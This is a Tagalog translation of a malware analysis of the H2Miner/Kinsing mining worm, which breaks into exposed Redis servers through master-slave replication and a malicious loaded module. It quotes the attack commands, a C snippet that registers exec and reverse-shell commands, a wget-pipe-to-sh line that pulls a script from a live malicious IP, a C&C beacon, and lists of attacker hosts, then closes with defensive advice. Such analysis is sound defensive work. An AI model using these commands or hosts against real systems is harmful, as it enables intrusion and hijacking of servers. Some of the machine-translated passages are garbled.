Isang araw ang nakalipas, ang isa sa mga server ng aking proyekto ay inatake ng isang katulad na uod. Sa paghahanap ng sagot sa tanong na "ano iyon?" Nakakita ako ng magandang artikulo ng Alibaba Cloud Security team. Dahil hindi ko nakita ang artikulong ito sa HabrΓ©, nagpasya akong isalin ito lalo na para sa iyo <3
Pagpasok
Kamakailan, natuklasan ng pangkat ng seguridad ng Alibaba Cloud ang isang biglaang pagsiklab ng H2Miner. Ang ganitong uri ng malisyosong worm ay gumagamit ng kawalan ng awtorisasyon o mahinang mga password para sa Redis bilang mga gateway sa iyong mga system, pagkatapos nito ay isi-synchronize nito ang sarili nitong malisyosong module sa alipin sa pamamagitan ng master-slave na pag-synchronize at sa wakas ay dina-download ang nakakahamak na module na ito sa inaatakeng makina at nagsasagawa ng malisyosong mga tagubilin.
Noong nakaraan, ang mga pag-atake sa iyong mga system ay pangunahing isinasagawa gamit ang isang paraan na kinasasangkutan ng mga naka-iskedyul na gawain o mga SSH key na isinulat sa iyong makina pagkatapos mag-log in ang umaatake sa Redis. Sa kabutihang palad, ang paraang ito ay hindi maaaring gamitin nang madalas dahil sa mga problema sa kontrol ng pahintulot o dahil sa iba't ibang bersyon ng system. Gayunpaman, ang pamamaraang ito ng pag-load ng malisyosong module ay maaaring direktang isagawa ang mga utos ng umaatake o makakuha ng access sa shell, na mapanganib para sa iyong system.
Dahil sa malaking bilang ng mga server ng Redis na naka-host sa Internet (halos 1 milyon), ang pangkat ng seguridad ng Alibaba Cloud, bilang isang magiliw na paalala, ay nagrerekomenda na ang mga user ay huwag magbahagi ng Redis online at regular na suriin ang lakas ng kanilang mga password at kung sila ay nakompromiso. mabilis na pagpili.
H2Miner
Ang H2Miner ay isang mining botnet para sa Linux-based na mga system na maaaring manghimasok sa iyong system sa iba't ibang paraan, kabilang ang kawalan ng pahintulot sa Hadoop yarn, Docker, at Redis remote command execution (RCE) na mga kahinaan. Gumagana ang isang botnet sa pamamagitan ng pag-download ng mga nakakahamak na script at malware upang minahan ang iyong data, palawakin ang pag-atake nang pahalang, at panatilihin ang mga komunikasyon sa command at control (C&C).
Redis RCE
Ang kaalaman sa paksang ito ay ibinahagi ni Pavel Toporkov sa ZeroNights 2018. Pagkatapos ng bersyon 4.0, sinusuportahan ng Redis ang isang feature na naglo-load ng plug-in na nagbibigay sa mga user ng kakayahang mag-load upang ang mga file ay pinagsama-sama sa C sa Redis upang maisagawa ang mga partikular na command ng Redis. Ang function na ito, bagama't kapaki-pakinabang, ay naglalaman ng isang kahinaan kung saan, sa master-slave mode, ang mga file ay maaaring i-synchronize sa slave sa pamamagitan ng fullresync mode. Magagamit ito ng isang umaatake upang maglipat ng mga nakakahamak na file. Pagkatapos makumpleto ang paglilipat, ilo-load ng mga umaatake ang module sa inatake na Redis instance at isagawa ang anumang utos.
Pagsusuri ng Malware Worm
Kamakailan, natuklasan ng pangkat ng seguridad ng Alibaba Cloud na ang laki ng malisyosong grupong minero ng H2Miner ay biglang tumaas nang husto. Ayon sa pagsusuri, ang pangkalahatang proseso ng paglitaw ng pag-atake ay ang mga sumusunod:
Ginagamit ng H2Miner ang RCE Redis para sa isang ganap na pag-atake. Inaatake muna ng mga attacker ang mga hindi protektadong server o server ng Redis na may mahinang password.
Pagkatapos ay ginagamit nila ang utos config set dbfilename red2.so upang baguhin ang pangalan ng file. Pagkatapos nito, isinasagawa ng mga umaatake ang utos slaveof para itakda ang master-slave replication host address.
Kapag ang inatake na Redis instance ay nagtatag ng isang master-slave na koneksyon sa malisyosong Redis na pag-aari ng attacker, ipinapadala ng attacker ang infected na module gamit ang fullresync command upang i-synchronize ang mga file. Ang red2.so file ay mada-download sa inaatakeng makina. Pagkatapos ay ginagamit ng mga umaatake ang ./red2.so loading module para i-load ito sa so file. Ang module ay maaaring magsagawa ng mga utos mula sa isang umaatake o magpasimula ng reverse connection (backdoor) upang makakuha ng access sa inatake na makina.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Pagkatapos magsagawa ng malisyosong utos tulad ng / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ire-reset ng attacker ang backup na pangalan ng file at i-unload ang system module upang linisin ang mga bakas. Gayunpaman, mananatili pa rin ang red2.so file sa inatakeng makina. Pinapayuhan ang mga gumagamit na bigyang-pansin ang pagkakaroon ng gayong kahina-hinalang file sa folder ng kanilang instance ng Redis.
Bilang karagdagan sa pagpatay sa ilang malisyosong proseso upang magnakaw ng mga mapagkukunan, sinundan ng umaatake ang isang nakakahamak na script sa pamamagitan ng pag-download at pag-execute ng mga nakakahamak na binary file sa . Nangangahulugan ito na ang pangalan ng proseso o pangalan ng direktoryo na naglalaman ng kinsing sa host ay maaaring magpahiwatig na ang makina na iyon ay nahawaan ng virus na ito.
Ayon sa mga resulta ng reverse engineering, pangunahing ginagawa ng malware ang mga sumusunod na function:
- Pag-upload ng mga file at pagpapatupad ng mga ito
- Pagmimina
- Pagpapanatili ng komunikasyon sa C&C at pagpapatupad ng mga command ng attacker
Gumamit ng masscan para sa panlabas na pag-scan upang palawakin ang iyong impluwensya. Bilang karagdagan, ang IP address ng C&C server ay hard-coded sa programa, at ang inaatakeng host ay makikipag-ugnayan sa C&C communication server gamit ang mga HTTP request, kung saan ang zombie (nakompromisong server) na impormasyon ay natukoy sa HTTP header.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Iba pang mga paraan ng pag-atake
Mga address at link na ginagamit ng uod
/kinsing
β’ 142.44.191.122/t.sh
β’ 185.92.74.42/h.sh
β’ 142.44.191.122/spr.sh
β’ 142.44.191.122/spre.sh
β’ 195.3.146.118/unk.sh
s&c
β’ 45.10.88.102
β’ 91.215.169.111
β’ 139.99.50.255
β’ 46.243.253.167
β’ 195.123.220.193
Payo
Una, ang Redis ay hindi dapat ma-access mula sa Internet at dapat na protektahan ng isang malakas na password. Mahalaga rin na suriin ng mga kliyente na walang red2.so file sa direktoryo ng Redis at walang "kinsing" sa file/process name sa host.
Pinagmulan: www.habr.com